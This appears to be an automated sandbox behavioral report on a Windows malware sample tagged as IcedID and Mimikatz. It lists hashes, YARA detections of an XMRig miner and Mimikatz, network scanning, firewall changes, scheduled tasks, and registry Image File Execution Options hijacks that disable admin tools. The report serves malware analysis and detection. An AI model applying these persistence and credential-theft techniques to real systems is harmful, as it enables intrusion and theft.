Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
06/05/2024, 05:31
Behavioral task
behavioral1
Sample
2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe
Resource
win7-20240215-en
General
-
Target
2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe
-
Size
7.5MB
-
MD5
8292d241bee855bd08449c5df165663e
-
SHA1
e6145743a8d9d2d5250b1c0b2dfe2b90924ddb47
-
SHA256
6d19053581d225ec2e394c9373ceb292d961eb5b32f496e794b2b681238445d8
-
SHA512
b1c624bd1ccb153c8287e6af1e88c3a1b42cbd1e59ba34bbe779b683d9221e8cf7ad44ad092c40146a12c3c5f590c12fce934a4063fb6a537048192756950917
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1308 created 2088 1308 euubyab.exe 38 -
Contacts a large (30347) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral2/memory/220-136-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral2/memory/220-138-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 41 IoCs
resource yara_rule behavioral2/memory/4632-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/4632-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000c000000023b8d-6.dat UPX behavioral2/memory/2280-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/220-136-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp UPX behavioral2/files/0x000a000000023bd9-135.dat UPX behavioral2/memory/220-138-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp UPX behavioral2/memory/2772-142-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/files/0x000e000000023bf1-141.dat UPX behavioral2/memory/2772-160-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/files/0x000b000000023be1-163.dat UPX behavioral2/memory/1704-165-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1680-171-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/4540-179-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/2776-183-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-185-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/2664-188-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/4940-192-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/5072-196-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-198-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/2460-201-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-204-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/4996-206-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/768-210-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/2456-214-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-216-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1088-219-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-221-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/2776-224-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/3244-228-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/2308-231-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-232-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/4404-234-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/2460-236-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/4424-238-0x00007FF720880000-0x00007FF7208DB000-memory.dmp UPX behavioral2/memory/1704-249-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1704-252-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1704-255-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1704-302-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1704-309-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX behavioral2/memory/1704-311-0x00007FF632320000-0x00007FF632440000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/1704-185-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-198-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-204-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-216-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-221-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-232-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-249-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-252-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-255-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-302-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-309-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig behavioral2/memory/1704-311-0x00007FF632320000-0x00007FF632440000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/4632-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4632-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000c000000023b8d-6.dat mimikatz behavioral2/memory/2280-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/220-136-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp mimikatz behavioral2/memory/220-138-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts euubyab.exe File opened for modification C:\Windows\system32\drivers\etc\hosts euubyab.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2988 netsh.exe 3376 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe euubyab.exe -
Executes dropped EXE 29 IoCs
pid Process 2280 euubyab.exe 1308 euubyab.exe 3552 wpcap.exe 4848 tzdhiutbu.exe 220 vfshost.exe 2772 fasthhukb.exe 4320 xohudmc.exe 4076 hmdriy.exe 1704 btglic.exe 1680 fasthhukb.exe 5104 euubyab.exe 4540 fasthhukb.exe 2776 fasthhukb.exe 2664 fasthhukb.exe 4940 fasthhukb.exe 5072 fasthhukb.exe 2460 fasthhukb.exe 4996 fasthhukb.exe 768 fasthhukb.exe 2456 fasthhukb.exe 1088 fasthhukb.exe 2776 fasthhukb.exe 3244 fasthhukb.exe 2308 fasthhukb.exe 4404 fasthhukb.exe 2460 fasthhukb.exe 4424 fasthhukb.exe 4500 btczbitmk.exe 1800 euubyab.exe -
Loads dropped DLL 12 IoCs
pid Process 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 3552 wpcap.exe 4848 tzdhiutbu.exe 4848 tzdhiutbu.exe 4848 tzdhiutbu.exe -
resource yara_rule behavioral2/memory/220-136-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp upx behavioral2/files/0x000a000000023bd9-135.dat upx behavioral2/memory/220-138-0x00007FF787D70000-0x00007FF787E5E000-memory.dmp upx behavioral2/memory/2772-142-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/files/0x000e000000023bf1-141.dat upx behavioral2/memory/2772-160-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/files/0x000b000000023be1-163.dat upx behavioral2/memory/1704-165-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1680-171-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/4540-179-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/2776-183-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-185-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/2664-188-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/4940-192-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/5072-196-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-198-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/2460-201-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-204-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/4996-206-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/768-210-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/2456-214-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-216-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1088-219-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-221-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/2776-224-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/3244-228-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/2308-231-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-232-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/4404-234-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/2460-236-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/4424-238-0x00007FF720880000-0x00007FF7208DB000-memory.dmp upx behavioral2/memory/1704-249-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1704-252-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1704-255-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1704-302-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1704-309-0x00007FF632320000-0x00007FF632440000-memory.dmp upx behavioral2/memory/1704-311-0x00007FF632320000-0x00007FF632440000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ifconfig.me 87 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content euubyab.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\hmdriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\hmdriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 euubyab.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 euubyab.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData euubyab.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 euubyab.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\luuiqmitm\UnattendGC\specials\libxml2.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\tibe-2.dll euubyab.exe File opened for modification C:\Windows\nziamibb\svschost.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\AppCapture32.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\exma-1.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\spoolsrv.xml euubyab.exe File opened for modification C:\Windows\nziamibb\spoolsrv.xml euubyab.exe File created C:\Windows\luuiqmitm\ialplgwet\wpcap.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\schoedcl.xml euubyab.exe File created C:\Windows\nziamibb\svschost.xml euubyab.exe File created C:\Windows\nziamibb\spoolsrv.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\Shellcode.ini euubyab.exe File created C:\Windows\ime\euubyab.exe euubyab.exe File created C:\Windows\nziamibb\euubyab.exe 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\ucl.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\schoedcl.exe euubyab.exe File opened for modification C:\Windows\nziamibb\schoedcl.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\zlib1.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\svschost.xml euubyab.exe File created C:\Windows\nziamibb\schoedcl.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\spoolsrv.xml euubyab.exe File created C:\Windows\nziamibb\docmicfg.xml euubyab.exe File created C:\Windows\luuiqmitm\Corporate\mimidrv.sys euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\ssleay32.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\docmicfg.exe euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\AppCapture64.dll euubyab.exe File created C:\Windows\luuiqmitm\Corporate\mimilib.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\crli-0.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\svschost.exe euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\vimpcsvc.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\schoedcl.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\docmicfg.xml euubyab.exe File opened for modification C:\Windows\nziamibb\vimpcsvc.xml euubyab.exe File opened for modification C:\Windows\luuiqmitm\Corporate\log.txt cmd.exe File created C:\Windows\luuiqmitm\ialplgwet\tzdhiutbu.exe euubyab.exe File created C:\Windows\luuiqmitm\ialplgwet\Packet.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\vimpcsvc.exe euubyab.exe File created C:\Windows\luuiqmitm\ialplgwet\ip.txt euubyab.exe File created C:\Windows\luuiqmitm\ialplgwet\wpcap.exe euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\coli-0.dll euubyab.exe File created C:\Windows\luuiqmitm\upbdrjv\swrpwe.exe euubyab.exe File opened for modification C:\Windows\nziamibb\docmicfg.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\posh-0.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\svschost.xml euubyab.exe File created C:\Windows\nziamibb\vimpcsvc.xml euubyab.exe File opened for modification C:\Windows\luuiqmitm\ialplgwet\Result.txt btczbitmk.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\trfo-2.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\tucl-1.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\xdvl-0.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\libeay32.dll euubyab.exe File created C:\Windows\luuiqmitm\ialplgwet\scan.bat euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\spoolsrv.exe euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\docmicfg.xml euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\vimpcsvc.xml euubyab.exe File opened for modification C:\Windows\nziamibb\euubyab.exe 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\luuiqmitm\ialplgwet\Packet.dll euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\cnli-1.dll euubyab.exe File created C:\Windows\luuiqmitm\ialplgwet\btczbitmk.exe euubyab.exe File created C:\Windows\luuiqmitm\UnattendGC\specials\trch-1.dll euubyab.exe File created C:\Windows\luuiqmitm\Corporate\vfshost.exe euubyab.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4608 sc.exe 1544 sc.exe 2448 sc.exe 4612 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000c000000023b8d-6.dat nsis_installer_2 behavioral2/files/0x000c000000023aa7-15.dat nsis_installer_1 behavioral2/files/0x000c000000023aa7-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1088 schtasks.exe 5060 schtasks.exe 4708 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ euubyab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" euubyab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" euubyab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing euubyab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created 